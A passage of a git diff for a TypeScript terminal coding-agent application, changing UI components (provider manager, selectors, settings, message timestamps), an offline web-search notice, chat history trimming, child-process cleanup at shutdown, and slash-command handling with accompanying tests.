this.tui.requestRender(); + } else { + this.onDone(); + } } else if (keyData === "d" || keyData === "D") { const provider = this.providers[this.selectedIndex]; if (provider?.supportsDiscovery) { @@ -153,10 +193,26 @@ export class ProviderManagerComponent extends Container implements Focusable { } else if (keyData === "r" || keyData === "R") { const provider = this.providers[this.selectedIndex]; if (provider?.hasAuth) { - this.authStorage.remove(provider.name); - this.loadProviders(); - this.updateList(); - this.tui.requestRender(); + if (this.confirmingRemove) { + this.confirmingRemove = false; + this.authStorage.remove(provider.name); + this.modelsJsonWriter.removeProvider(provider.name); + this.modelRegistry.refresh(); + this.loadProviders(); + this.updateHints(); + this.updateList(); + this.tui.requestRender(); + } else { + this.confirmingRemove = true; + this.updateHints(); + this.tui.requestRender(); + } + } + } else if (kb.matches(keyData, "selectConfirm")) { + // Enter key → initiate auth setup for the selected provider (#3579) + const provider = this.providers[this.selectedIndex]; + if (provider) { + this.onSetupAuth(provider.name); } } } diff --git a/packages/pi-coding-agent/src/modes/interactive/components/scoped-models-selector.ts b/packages/pi-coding-agent/src/modes/interactive/components/scoped-models-selector.ts index 22f677540..2e1c9e41e 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/scoped-models-selector.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/scoped-models-selector.ts @@ -1,4 +1,5 @@ import type { Model } from "@gsd/pi-ai"; +import { providerDisplayName } from "./model-selector.js"; import { Container, type Focusable, @@ -204,7 +205,7 @@ export class ScopedModelsSelectorComponent extends Container implements Focusabl const isSelected = i === this.selectedIndex; const prefix = isSelected ? theme.fg("accent", "→ ") : " "; const modelText = isSelected ? theme.fg("accent", item.model.id) : item.model.id; - const providerBadge = theme.fg("muted", ` [${item.model.provider}]`); + const providerBadge = theme.fg("muted", ` [${providerDisplayName(item.model.provider)}]`); const status = allEnabled ? "" : item.enabled ? theme.fg("success", " ✓") : theme.fg("dim", " ✗"); this.listContainer.addChild(new Text(`${prefix}${modelText}${providerBadge}${status}`, 0, 0)); } @@ -318,14 +319,9 @@ export class ScopedModelsSelectorComponent extends Container implements Focusabl return; } - // Ctrl+C - clear search or cancel if empty + // Ctrl+C - always cancel immediately if (matchesKey(data, Key.ctrl("c"))) { - if (this.searchInput.getValue()) { - this.searchInput.setValue(""); - this.refresh(); - } else { - this.callbacks.onCancel(); - } + this.callbacks.onCancel(); return; } diff --git a/packages/pi-coding-agent/src/modes/interactive/components/session-selector.ts b/packages/pi-coding-agent/src/modes/interactive/components/session-selector.ts index ff37698e0..ac08e7761 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/session-selector.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/session-selector.ts @@ -570,13 +570,13 @@ class SessionList implements Component, Focusable { return; } - // Up arrow + // Up arrow (wrap) if (kb.matches(keyData, "selectUp")) { - this.selectedIndex = Math.max(0, this.selectedIndex - 1); + this.selectedIndex = this.selectedIndex === 0 ? this.filteredSessions.length - 1 : this.selectedIndex - 1; } - // Down arrow + // Down arrow (wrap) else if (kb.matches(keyData, "selectDown")) { - this.selectedIndex = Math.min(this.filteredSessions.length - 1, this.selectedIndex + 1); + this.selectedIndex = this.selectedIndex === this.filteredSessions.length - 1 ? 0 : this.selectedIndex + 1; } // Page up - jump up by maxVisible items else if (kb.matches(keyData, "selectPageUp")) { diff --git a/packages/pi-coding-agent/src/modes/interactive/components/settings-selector.ts b/packages/pi-coding-agent/src/modes/interactive/components/settings-selector.ts index 425154982..5b324af2c 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/settings-selector.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/settings-selector.ts @@ -45,6 +45,7 @@ export interface SettingsConfig { respectGitignoreInPicker: boolean; quietStartup: boolean; clearOnShrink: boolean; + timestampFormat: "date-time-iso" | "date-time-us"; } export interface SettingsCallbacks { @@ -69,6 +70,7 @@ export interface SettingsCallbacks { onRespectGitignoreInPickerChange: (enabled: boolean) => void; onQuietStartupChange: (enabled: boolean) => void; onClearOnShrinkChange: (enabled: boolean) => void; + onTimestampFormatChange: (format: "date-time-iso" | "date-time-us") => void; onCancel: () => void; } @@ -355,6 +357,16 @@ export class SettingsSelectorComponent extends Container { values: ["true", "false"], }); + // Timestamp format (insert after respect-gitignore-in-picker) + const gitignoreIndex = items.findIndex((item) => item.id === "respect-gitignore-in-picker"); + items.splice(gitignoreIndex + 1, 0, { + id: "timestamp-format", + label: "Timestamp format", + description: "Date/time format for message timestamps", + currentValue: config.timestampFormat, + values: ["date-time-iso", "date-time-us"], + }); + // Add borders this.addChild(new DynamicBorder()); @@ -420,6 +432,9 @@ export class SettingsSelectorComponent extends Container { case "respect-gitignore-in-picker": callbacks.onRespectGitignoreInPickerChange(newValue === "true"); break; + case "timestamp-format": + callbacks.onTimestampFormatChange(newValue as "date-time-iso" | "date-time-us"); + break; } }, callbacks.onCancel, diff --git a/packages/pi-coding-agent/src/modes/interactive/components/skill-invocation-message.ts b/packages/pi-coding-agent/src/modes/interactive/components/skill-invocation-message.ts index adbf71fd9..4e88f8eff 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/skill-invocation-message.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/skill-invocation-message.ts @@ -35,7 +35,7 @@ export class SkillInvocationMessageComponent extends Box { if (this.expanded) { // Expanded: label + skill name header + full content - const label = theme.fg("customMessageLabel", `\x1b[1m[skill]\x1b[22m`); + const label = theme.fg("customMessageLabel", theme.bold("[skill]")); this.addChild(new Text(label, 0, 0)); const header = `**${this.skillBlock.name}**\n\n`; this.addChild( @@ -46,7 +46,7 @@ export class SkillInvocationMessageComponent extends Box { } else { // Collapsed: single line - [skill] name (hint to expand) const line = - theme.fg("customMessageLabel", `\x1b[1m[skill]\x1b[22m `) + + theme.fg("customMessageLabel", theme.bold("[skill]") + " ") + theme.fg("customMessageText", this.skillBlock.name) + theme.fg("dim", ` (${editorKey("expandTools")} to expand)`); this.addChild(new Text(line, 0, 0)); diff --git a/packages/pi-coding-agent/src/modes/interactive/components/timestamp.ts b/packages/pi-coding-agent/src/modes/interactive/components/timestamp.ts new file mode 100644 index 000000000..0380571ca --- /dev/null +++ b/packages/pi-coding-agent/src/modes/interactive/components/timestamp.ts @@ -0,0 +1,48 @@ +/** + * Timestamp formatting for message display. + * + * Formats: + * - "time-date-iso": 10:34 2025-03-24 (default) + * - "date-time-iso": 2025-03-24 10:34 + * - "time-date-us": 10:34 AM 03/24/2025 + * - "date-time-us": 03/24/2025 10:34 AM + */ + +export type TimestampFormat = "date-time-iso" | "date-time-us"; + +function pad2(n: number): string { + return n.toString().padStart(2, "0"); +} + +function isoDate(d: Date): string { + return `${d.getFullYear()}-${pad2(d.getMonth() + 1)}-${pad2(d.getDate())}`; +} + +function isoTime(d: Date): string { + return `${pad2(d.getHours())}:${pad2(d.getMinutes())}`; +} + +function usDate(d: Date): string { + return `${pad2(d.getMonth() + 1)}-${pad2(d.getDate())}-${d.getFullYear()}`; +} + +function usTime(d: Date): string { + const hours = d.getHours(); + const period = hours >= 12 ? "PM" : "AM"; + const h = hours % 12 || 12; + return `${h}:${pad2(d.getMinutes())} ${period}`; +} + +/** + * Format a timestamp for message display using the specified format. + */ +export function formatTimestamp(timestamp: number, format: TimestampFormat = "date-time-iso"): string { + const d = new Date(timestamp); + + switch (format) { + case "date-time-iso": + return `${isoDate(d)} ${isoTime(d)}`; + case "date-time-us": + return `${usDate(d)} ${usTime(d)}`; + } +} diff --git a/packages/pi-coding-agent/src/modes/interactive/components/tool-execution.ts b/packages/pi-coding-agent/src/modes/interactive/components/tool-execution.ts index 80d25b0f0..1b1c547d9 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/tool-execution.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/tool-execution.ts @@ -3,6 +3,7 @@ import { Container, getCapabilities, Image, + type ImageDimensions, imageFallback, Spacer, Text, @@ -32,7 +33,7 @@ const WRITE_PARTIAL_FULL_HIGHLIGHT_LINES = 50; * Replace tabs with spaces for consistent rendering */ function replaceTabs(text: string): string { - return text.replace(/\t/g, " "); + return text.replace(/\t/g, " "); } /** @@ -88,6 +89,9 @@ export class ToolExecutionComponent extends Container { private editDiffArgsKey?: string; // Track which args the preview is for // Cached converted images for Kitty protocol (which requires PNG), keyed by index private convertedImages: Map = new Map(); + // Cached resolved image dimensions to avoid re-triggering async parsing + // when updateDisplay() recreates Image components (#3455). + private resolvedImageDimensions: Map = new Map(); // Incremental syntax highlighting cache for write tool call args private writeHighlightCache?: WriteHighlightCache; // When true, this component intentionally renders no lines @@ -137,6 +141,15 @@ export class ToolExecutionComponent extends Container { return isBuiltInName && !hasCustomRenderers; } + dispose(): void { + this.convertedImages.clear(); + this.imageComponents = []; + this.imageSpacers = []; + this.editDiffPreview = undefined; + this.writeHighlightCache = undefined; + this.result = undefined; + } + updateArgs(args: any): void { this.args = args; if (this.toolName === "write" && this.isPartial) { @@ -472,16 +485,28 @@ export class ToolExecutionComponent extends Container { const spacer = new Spacer(1); this.addChild(spacer); this.imageSpacers.push(spacer); + // Pass cached dimensions to avoid re-triggering async parsing + // when updateDisplay() recreates Image components (#3455). + const cachedDims = this.resolvedImageDimensions.get(i); const imageComponent = new Image( imageData, imageMimeType, { fallbackColor: (s: string) => theme.fg("toolOutput", s) }, { maxWidthCells: 60 }, + cachedDims, ); - imageComponent.setOnDimensionsResolved(() => { - this.updateDisplay(); - this.ui.requestRender(); - }); + if (!cachedDims) { + const imgIdx = i; + imageComponent.setOnDimensionsResolved(() => { + // Cache resolved dimensions so future updateDisplay() calls + // don't re-trigger async parsing → infinite loop (#3455). + const dims = imageComponent.getDimensions?.(); + if (dims) this.resolvedImageDimensions.set(imgIdx, dims); + // Just re-render — don't call updateDisplay() which would + // destroy and recreate all Image components. + this.ui.requestRender(); + }); + } this.imageComponents.push(imageComponent); this.addChild(imageComponent); } @@ -895,7 +920,9 @@ export class ToolExecutionComponent extends Container { // Server-side Anthropic web search text = theme.fg("toolTitle", theme.bold("web search")); - if (this.result) { + if (process.env.PI_OFFLINE === "1") { + text += "\n\n" + theme.fg("muted", "\u{1F50C} Offline \u{2014} web search unavailable"); + } else if (this.result) { const output = this.getTextOutput().trim(); if (output) { const lines = output.split("\n"); @@ -913,8 +940,13 @@ export class ToolExecutionComponent extends Container { // Generic tool (shouldn't reach here for custom tools) text = theme.fg("toolTitle", theme.bold(this.toolName)); - const content = JSON.stringify(this.args, null, 2); - text += `\n\n${content}`; + const contentLines = JSON.stringify(this.args, null, 2).split("\n"); + const maxContentLines = 20; + const truncatedContent = contentLines.slice(0, maxContentLines); + if (contentLines.length > maxContentLines) { + truncatedContent.push("..."); + } + text += `\n\n${truncatedContent.join("\n")}`; const output = this.getTextOutput(); if (output) { text += `\n${output}`; diff --git a/packages/pi-coding-agent/src/modes/interactive/components/user-message-selector.ts b/packages/pi-coding-agent/src/modes/interactive/components/user-message-selector.ts index 94ccf93df..800232faa 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/user-message-selector.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/user-message-selector.ts @@ -131,9 +131,10 @@ export class UserMessageSelectorComponent extends Container { this.addChild(new Spacer(1)); this.addChild(new DynamicBorder()); - // Auto-cancel if no messages + // Auto-cancel if no messages — invoke synchronously via microtask + // to avoid the 100ms visual flicker from setTimeout if (messages.length === 0) { - setTimeout(() => onCancel(), 100); + Promise.resolve().then(() => onCancel()); } } diff --git a/packages/pi-coding-agent/src/modes/interactive/components/user-message.ts b/packages/pi-coding-agent/src/modes/interactive/components/user-message.ts index a6de30a62..8aab303ba 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/user-message.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/user-message.ts @@ -1,15 +1,21 @@ -import { Container, Markdown, type MarkdownTheme, Spacer } from "@gsd/pi-tui"; +import { Container, Markdown, type MarkdownTheme, Spacer, Text } from "@gsd/pi-tui"; import { getMarkdownTheme, theme } from "../theme/theme.js"; +import { formatTimestamp, type TimestampFormat } from "./timestamp.js"; const OSC133_ZONE_START = "\x1b]133;A\x07"; const OSC133_ZONE_END = "\x1b]133;B\x07"; /** - * Component that renders a user message + * Component that renders a user message with a right-aligned timestamp. */ export class UserMessageComponent extends Container { - constructor(text: string, markdownTheme: MarkdownTheme = getMarkdownTheme()) { + private timestamp: number | undefined; + private timestampFormat: TimestampFormat; + + constructor(text: string, markdownTheme: MarkdownTheme = getMarkdownTheme(), timestamp?: number, timestampFormat: TimestampFormat = "date-time-iso") { super(); + this.timestamp = timestamp; + this.timestampFormat = timestampFormat; this.addChild(new Spacer(1)); this.addChild( new Markdown(text, 1, 1, markdownTheme, { @@ -25,6 +31,15 @@ export class UserMessageComponent extends Container { return lines; } + // Insert right-aligned timestamp above the message content + if (this.timestamp) { + const timeStr = formatTimestamp(this.timestamp, this.timestampFormat); + const label = theme.fg("dim", timeStr); + const padding = Math.max(0, width - timeStr.length - 1); + const timestampLine = " ".repeat(padding) + label; + lines.splice(0, 0, timestampLine); + } + lines[0] = OSC133_ZONE_START + lines[0]; lines[lines.length - 1] = lines[lines.length - 1] + OSC133_ZONE_END; return lines; diff --git a/packages/pi-coding-agent/src/modes/interactive/controllers/chat-controller.ts b/packages/pi-coding-agent/src/modes/interactive/controllers/chat-controller.ts index 32f10d339..0fed98bd4 100644 --- a/packages/pi-coding-agent/src/modes/interactive/controllers/chat-controller.ts +++ b/packages/pi-coding-agent/src/modes/interactive/controllers/chat-controller.ts @@ -6,6 +6,9 @@ import { AssistantMessageComponent } from "../components/assistant-message.js"; import { ToolExecutionComponent } from "../components/tool-execution.js"; import { appKey } from "../components/keybinding-hints.js"; +// Tracks the last processed content index to avoid re-scanning all blocks on every message_update +let lastProcessedContentIndex = 0; + export async function handleAgentEvent(host: InteractiveModeStateHost & { init: () => Promise; getMarkdownThemeWithSettings: () => any; @@ -28,6 +31,11 @@ export async function handleAgentEvent(host: InteractiveModeStateHost & { host.footer.invalidate(); + // Reset content index tracker when a new assistant message starts + if (event.type === "message_start" && event.message.role === "assistant") { + lastProcessedContentIndex = 0; + } + switch (event.type) { case "session_state_changed": switch (event.reason) { @@ -100,6 +108,7 @@ export async function handleAgentEvent(host: InteractiveModeStateHost & { undefined, host.hideThinkingBlock, host.getMarkdownThemeWithSettings(), + host.settingsManager.getTimestampFormat(), ); host.streamingMessage = event.message; host.chatContainer.addChild(host.streamingComponent); @@ -112,7 +121,9 @@ export async function handleAgentEvent(host: InteractiveModeStateHost & { if (host.streamingComponent && event.message.role === "assistant") { host.streamingMessage = event.message; host.streamingComponent.updateContent(host.streamingMessage); - for (const content of host.streamingMessage.content) { + const contentBlocks = host.streamingMessage.content; + for (let i = lastProcessedContentIndex; i < contentBlocks.length; i++) { + const content = contentBlocks[i]; if (content.type === "toolCall") { if (!host.pendingTools.has(content.id)) { const component = new ToolExecutionComponent( @@ -144,16 +155,28 @@ export async function handleAgentEvent(host: InteractiveModeStateHost & { } else if (content.type === "webSearchResult") { const component = host.pendingTools.get(content.toolUseId); if (component) { - const searchContent = content.content; - const isError = searchContent && typeof searchContent === "object" && "type" in (searchContent as any) && (searchContent as any).type === "web_search_tool_result_error"; - component.updateResult({ - content: [{ type: "text", text: host.formatWebSearchResult(searchContent) }], - isError: !!isError, - }); - host.pendingTools.delete(content.toolUseId); + if (process.env.PI_OFFLINE === "1") { + component.updateResult({ + content: [{ type: "text", text: "Web search disabled (offline mode)" }], + isError: false, + }); + } else { + const searchContent = content.content; + const isError = searchContent && typeof searchContent === "object" && "type" in (searchContent as any) && (searchContent as any).type === "web_search_tool_result_error"; + component.updateResult({ + content: [{ type: "text", text: host.formatWebSearchResult(searchContent) }], + isError: !!isError, + }); + } } } } + // Update index: fully processed blocks won't need re-scanning. + // Keep the last block's index (it may still be accumulating data), + // so we re-check it next time but skip all earlier ones. + if (contentBlocks.length > 0) { + lastProcessedContentIndex = Math.max(0, contentBlocks.length - 1); + } host.ui.requestRender(); } break; @@ -330,5 +353,12 @@ export async function handleAgentEvent(host: InteractiveModeStateHost & { host.showError(event.reason); host.ui.requestRender(); break; + + case "image_overflow_recovery": + host.showStatus( + `Removed ${event.strippedCount} older image(s) to comply with API limits. Retrying...`, + ); + host.ui.requestRender(); + break; } } diff --git a/packages/pi-coding-agent/src/modes/interactive/controllers/input-controller.test.ts b/packages/pi-coding-agent/src/modes/interactive/controllers/input-controller.test.ts new file mode 100644 index 000000000..6f5d22da5 --- /dev/null +++ b/packages/pi-coding-agent/src/modes/interactive/controllers/input-controller.test.ts @@ -0,0 +1,183 @@ +import assert from "node:assert/strict"; +import test from "node:test"; + +import { setupEditorSubmitHandler } from "./input-controller.js"; + +type HostOptions = { + knownSlashCommands?: string[]; +}; + +function getSlashCommandName(text: string): string { + const trimmed = text.trim(); + const spaceIndex = trimmed.indexOf(" "); + return spaceIndex === -1 ? trimmed.slice(1) : trimmed.slice(1, spaceIndex); +} + +function createHost(options: HostOptions = {}) { + const prompted: string[] = []; + const errors: string[] = []; + const warnings: string[] = []; + const history: string[] = []; + const knownSlashCommands = new Set(options.knownSlashCommands ?? []); + let editorText = ""; + let settingsOpened = 0; + + const editor = { + setText(text: string) { + editorText = text; + }, + getText() { + return editorText; + }, + addToHistory(text: string) { + history.push(text); + }, + }; + + const host = { + defaultEditor: editor as typeof editor & { onSubmit?: (text: string) => Promise }, + editor, + session: { + isBashRunning: false, + isCompacting: false, + isStreaming: false, + prompt: async (text: string) => { + prompted.push(text); + }, + }, + ui: { + requestRender() {}, + }, + getSlashCommandContext: () => ({ + showSettingsSelector: () => { + settingsOpened += 1; + }, + }), + handleBashCommand: async () => {}, + showWarning(message: string) { + warnings.push(message); + }, + showError(message: string) { + errors.push(message); + }, + updateEditorBorderColor() {}, + isExtensionCommand() { + return false; + }, + isKnownSlashCommand(text: string) { + return knownSlashCommands.has(getSlashCommandName(text)); + }, + queueCompactionMessage() {}, + updatePendingMessagesDisplay() {}, + flushPendingBashComponents() {}, + }; + + setupEditorSubmitHandler(host as any); + + return { + host: host as typeof host & { defaultEditor: typeof editor & { onSubmit: (text: string) => Promise } }, + prompted, + errors, + warnings, + history, + getEditorText: () => editorText, + getSettingsOpened: () => settingsOpened, + }; +} + +test("input-controller: built-in slash commands stay in TUI dispatch", async () => { + const { host, prompted, errors, getSettingsOpened, getEditorText } = createHost(); + + await host.defaultEditor.onSubmit("/settings"); + + assert.equal(getSettingsOpened(), 1, "built-in /settings should open the settings selector"); + assert.deepEqual(prompted, [], "built-in slash commands should not reach session.prompt"); + assert.deepEqual(errors, [], "built-in slash commands should not show errors"); + assert.equal(getEditorText(), "", "built-in slash commands should clear the editor after handling"); +}); + +test("input-controller: extension slash commands fall through to session.prompt", async () => { + const { host, prompted, errors, history } = createHost({ knownSlashCommands: ["gsd"] }); + + await host.defaultEditor.onSubmit("/gsd help"); + + assert.deepEqual(prompted, ["/gsd help"], "known extension slash commands should reach session.prompt"); + assert.deepEqual(errors, [], "known extension slash commands should not show unknown-command errors"); + assert.deepEqual(history, ["/gsd help"], "known extension slash commands should still be added to history"); +}); + +test("input-controller: prompt template slash commands fall through to session.prompt", async () => { + const { host, prompted, errors } = createHost({ knownSlashCommands: ["daily"] }); + + await host.defaultEditor.onSubmit("/daily focus area"); + + assert.deepEqual(prompted, ["/daily focus area"]); + assert.deepEqual(errors, []); +}); + +test("input-controller: skill slash commands fall through to session.prompt", async () => { + const { host, prompted, errors } = createHost({ knownSlashCommands: ["skill:create-skill"] }); + + await host.defaultEditor.onSubmit("/skill:create-skill routing bug"); + + assert.deepEqual(prompted, ["/skill:create-skill routing bug"]); + assert.deepEqual(errors, []); +}); + +test("input-controller: disabled skill slash commands stay unknown", async () => { + const { host, prompted, errors } = createHost(); + + await host.defaultEditor.onSubmit("/skill:create-skill routing bug"); + + assert.deepEqual(prompted, []); + assert.deepEqual(errors, ["Unknown command: /skill:create-skill. Use slash autocomplete to see available commands."]); +}); + +test("input-controller: /export prefix does not swallow unrelated slash commands", async () => { + const { host, prompted, errors } = createHost(); + + await host.defaultEditor.onSubmit("/exportfoo"); + + assert.deepEqual(prompted, []); + assert.deepEqual(errors, ["Unknown command: /exportfoo. Use slash autocomplete to see available commands."]); +}); + +test("input-controller: truly unknown slash commands stop before session.prompt", async () => { + const { host, prompted, errors, getEditorText } = createHost(); + + await host.defaultEditor.onSubmit("/definitely-not-a-command"); + + assert.deepEqual(prompted, [], "unknown slash commands should not reach session.prompt"); + assert.deepEqual( + errors, + ["Unknown command: /definitely-not-a-command. Use slash autocomplete to see available commands."], + ); + assert.equal(getEditorText(), "", "unknown slash commands should clear the editor after showing the error"); +}); + +test("input-controller: absolute file paths are not treated as slash commands (#3478)", async () => { + const { host, prompted, errors } = createHost(); + + await host.defaultEditor.onSubmit("/Users/name/Desktop/screenshot.png"); + + assert.deepEqual(errors, [], "file paths should not trigger unknown command error"); + assert.deepEqual(prompted, ["/Users/name/Desktop/screenshot.png"], "file paths should be sent as plain input"); +}); + +test("input-controller: Linux absolute paths are not treated as slash commands (#3478)", async () => { + const { host, prompted, errors } = createHost(); + + await host.defaultEditor.onSubmit("/home/user/documents/file.txt"); + + assert.deepEqual(errors, [], "Linux paths should not trigger unknown command error"); + assert.deepEqual(prompted, ["/home/user/documents/file.txt"], "Linux paths should be sent as plain input"); +}); + +test("input-controller: /tmp paths are not treated as slash commands (#3478)", async () => { + const { host, prompted, errors } = createHost(); + + await host.defaultEditor.onSubmit("/tmp/some-file.log"); + + assert.deepEqual(errors, []); + assert.deepEqual(prompted, ["/tmp/some-file.log"]); +}); diff --git a/packages/pi-coding-agent/src/modes/interactive/controllers/input-controller.ts b/packages/pi-coding-agent/src/modes/interactive/controllers/input-controller.ts index 0bb073044..a1fefba87 100644 --- a/packages/pi-coding-agent/src/modes/interactive/controllers/input-controller.ts +++ b/packages/pi-coding-agent/src/modes/interactive/controllers/input-controller.ts @@ -8,6 +8,7 @@ export function setupEditorSubmitHandler(host: InteractiveModeStateHost & { showError: (message: string) => void; updateEditorBorderColor: () => void; isExtensionCommand: (text: string) => boolean; + isKnownSlashCommand: (text: string) => boolean; queueCompactionMessage: (text: string, mode: "steer" | "followUp") => void; updatePendingMessagesDisplay: () => void; flushPendingBashComponents: () => void; @@ -17,12 +18,18 @@ export function setupEditorSubmitHandler(host: InteractiveModeStateHost & { text = text.trim(); if (!text) return; - if (text.startsWith("/")) { + if (text.startsWith("/") && !looksLikeFilePath(text)) { const handled = await dispatchSlashCommand(text, host.getSlashCommandContext()); if (handled) { host.editor.setText(""); return; } + if (!host.isKnownSlashCommand(text)) { + const command = text.split(/\s/)[0]; + host.showError(`Unknown command: ${command}. Use slash autocomplete to see available commands.`); + host.editor.setText(""); + return; + } } if (text.startsWith("!")) { @@ -46,7 +53,12 @@ export function setupEditorSubmitHandler(host: InteractiveModeStateHost & { if (host.isExtensionCommand(text)) { host.editor.addToHistory?.(text); host.editor.setText(""); - await host.session.prompt(text); + try { + await host.session.prompt(text); + } catch (error: unknown) { + const errorMessage = error instanceof Error ? error.message : "Unknown error occurred"; + host.showError(errorMessage); + } } else { host.queueCompactionMessage(text, "steer"); } @@ -82,5 +94,28 @@ export function setupEditorSubmitHandler(host: InteractiveModeStateHost & { } host.editor.addToHistory?.(text); + // submitPromptsDirectly is false — still dispatch via session.prompt so user input + // is not silently discarded. + try { + await host.session.prompt(text); + } catch (error: unknown) { + const errorMessage = error instanceof Error ? error.message : "Unknown error occurred"; + host.showError(errorMessage); + } }; } + +/** + * Distinguish absolute file paths from slash commands (#3478). + * Drag-and-drop inserts paths like "/Users/name/Desktop/file.png" which + * should be treated as plain text input, not a /Users command. + * + * Heuristic: a slash command is a single token like "/help" or "/gsd auto". + * File paths have a second "/" within the first token (e.g., "/Users/..."). + */ +function looksLikeFilePath(text: string): boolean { + const firstToken = text.split(/\s/)[0]; + // Slash commands: /help, /gsd, /commit — single "/" at start only. + // File paths: /Users/name/file, /home/user/file, /tmp/x — contain "/" after position 0. + return firstToken.indexOf("/", 1) !== -1; +} diff --git a/packages/pi-coding-agent/src/modes/interactive/interactive-mode.ts b/packages/pi-coding-agent/src/modes/interactive/interactive-mode.ts index cd9550f12..72e98689e 100644 --- a/packages/pi-coding-agent/src/modes/interactive/interactive-mode.ts +++ b/packages/pi-coding-agent/src/modes/interactive/interactive-mode.ts @@ -7,6 +7,7 @@ import * as crypto from "node:crypto"; import * as fs from "node:fs"; import * as os from "node:os"; import * as path from "node:path"; +import { listDescendants } from "@gsd/native"; import type { AgentMessage } from "@gsd/pi-agent-core"; import type { AssistantMessage, ImageContent, Message, Model, OAuthProviderId } from "@gsd/pi-ai"; import type { @@ -78,9 +79,10 @@ import { ExtensionSelectorComponent } from "./components/extension-selector.js"; import { FooterComponent } from "./components/footer.js"; import { appKey, appKeyHint, editorKey, formatKeyForDisplay, keyHint, rawKeyHint } from "./components/keybinding-hints.js"; import { LoginDialogComponent } from "./components/login-dialog.js"; -import { ModelSelectorComponent } from "./components/model-selector.js"; +import { ModelSelectorComponent, providerDisplayName } from "./components/model-selector.js"; import { OAuthSelectorComponent } from "./components/oauth-selector.js"; import { ProviderManagerComponent } from "./components/provider-manager.js"; +import { getProviderSetupAction } from "./provider-auth-setup.js"; import { ScopedModelsSelectorComponent } from "./components/scoped-models-selector.js"; import { SessionSelectorComponent } from "./components/session-selector.js"; import { SettingsSelectorComponent } from "./components/settings-selector.js"; @@ -107,6 +109,7 @@ import { getThemeByName, initTheme, onThemeChange, + stopThemeWatcher, setRegisteredThemes, setTheme, setThemeInstance, @@ -156,6 +159,10 @@ export interface InteractiveModeOptions { } export class InteractiveMode { + // Cap rendered chat components to prevent unbounded memory/CPU growth. + // Only render-components are removed — session transcript stays on disk. + private static readonly MAX_CHAT_COMPONENTS = 100; + private session: AgentSession; private ui: TUI; private chatContainer: Container; @@ -202,6 +209,9 @@ export class InteractiveMode { // Agent subscription unsubscribe function private unsubscribe?: () => void; + // Branch change listener unsubscribe function + private _branchChangeUnsub?: () => void; + // Track if editor is in bash mode (text starts with !) private isBashMode = false; @@ -329,7 +339,7 @@ export class InteractiveMode { return filtered.map((item) => ({ value: item.label, label: item.id, - description: item.provider, + description: providerDisplayName(item.provider), })); }; } @@ -511,7 +521,7 @@ export class InteractiveMode { }); // Set up git branch watcher (uses provider instead of footer) - this.footerDataProvider.onBranchChange(() => { + this._branchChangeUnsub = this.footerDataProvider.onBranchChange(() => { this.ui.requestRender(); }); @@ -1519,6 +1529,13 @@ export class InteractiveMode { options: string[], opts?: ExtensionUIDialogOptions, ): Promise { + // If a previous selector is still active, dispose it before creating a + // new one. This avoids leaking the previous promise and DOM state when + // showExtensionSelector is called rapidly. + if (this.extensionSelector) { + this.hideExtensionSelector(); + } + return new Promise((resolve) => { if (opts?.signal?.aborted) { resolve(undefined); @@ -1982,6 +1999,7 @@ export class InteractiveMode { handleDebugCommand: () => this.handleDebugCommand(), shutdown: () => this.shutdown(), executeCompaction: (instructions, isAuto) => this.executeCompaction(instructions, isAuto), + handleBashCommand: (command, options) => this.handleBashCommand(command, options?.excludeFromContext, options?.displayCommand, options?.loginShell), }; } @@ -1990,8 +2008,9 @@ export class InteractiveMode { } private subscribeToAgent(): void { - this.unsubscribe = this.session.subscribe(async (event) => { - await this.handleEvent(event); + let eventQueue: Promise = Promise.resolve(); + this.unsubscribe = this.session.subscribe((event) => { + eventQueue = eventQueue.then(() => this.handleEvent(event)).catch(() => {}); }); } @@ -2092,11 +2111,13 @@ export class InteractiveMode { const userComponent = new UserMessageComponent( skillBlock.userMessage, this.getMarkdownThemeWithSettings(), + message.timestamp, + this.settingsManager.getTimestampFormat(), ); this.chatContainer.addChild(userComponent); } } else { - const userComponent = new UserMessageComponent(textContent, this.getMarkdownThemeWithSettings()); + const userComponent = new UserMessageComponent(textContent, this.getMarkdownThemeWithSettings(), message.timestamp, this.settingsManager.getTimestampFormat()); this.chatContainer.addChild(userComponent); } if (options?.populateHistory) { @@ -2110,6 +2131,7 @@ export class InteractiveMode { message, this.hideThinkingBlock, this.getMarkdownThemeWithSettings(), + this.settingsManager.getTimestampFormat(), ); this.chatContainer.addChild(assistantComponent); break; @@ -2122,6 +2144,18 @@ export class InteractiveMode { const _exhaustive: never = message; } } + this.trimChatHistory(); + } + + /** + * Remove oldest components when chat exceeds MAX_CHAT_COMPONENTS. + * Only render-components are removed — session data stays in SessionManager. + */ + private trimChatHistory(): void { + while (this.chatContainer.children.length > InteractiveMode.MAX_CHAT_COMPONENTS) { + const oldest = this.chatContainer.children[0]; + this.chatContainer.removeChild(oldest); + } } /** @@ -2216,6 +2250,7 @@ export class InteractiveMode { } this.pendingTools.clear(); + this.trimChatHistory(); this.ui.requestRender(); } @@ -2309,6 +2344,21 @@ export class InteractiveMode { if (shutdownBehavior === "stop_ui") { return; } + + // Kill ALL descendant processes to prevent orphans (next-server, pnpm dev, etc.) + try { + const descendants = listDescendants(process.pid); + for (const childPid of descendants) { + try { process.kill(childPid, "SIGTERM"); } catch {} + } + if (descendants.length > 0) { + await new Promise(resolve => setTimeout(resolve, 500)); + for (const childPid of descendants) { + try { process.kill(childPid, "SIGKILL"); } catch {} + } + } + } catch {} + process.exit(0); } @@ -2331,24 +2381,36 @@ export class InteractiveMode { const ignoreSigint = () => {}; process.on("SIGINT", ignoreSigint); - // Set up handler to restore TUI when resumed - process.once("SIGCONT", () => { + try { + // Set up handler to restore TUI when resumed + process.once("SIGCONT", () => { + process.removeListener("SIGINT", ignoreSigint); + this.ui.start(); + this.ui.requestRender(true); + }); + + // Stop the TUI (restore terminal to normal mode) + this.ui.stop(); + + // Send SIGTSTP to process group (pid=0 means all processes in group) + process.kill(0, "SIGTSTP"); + } 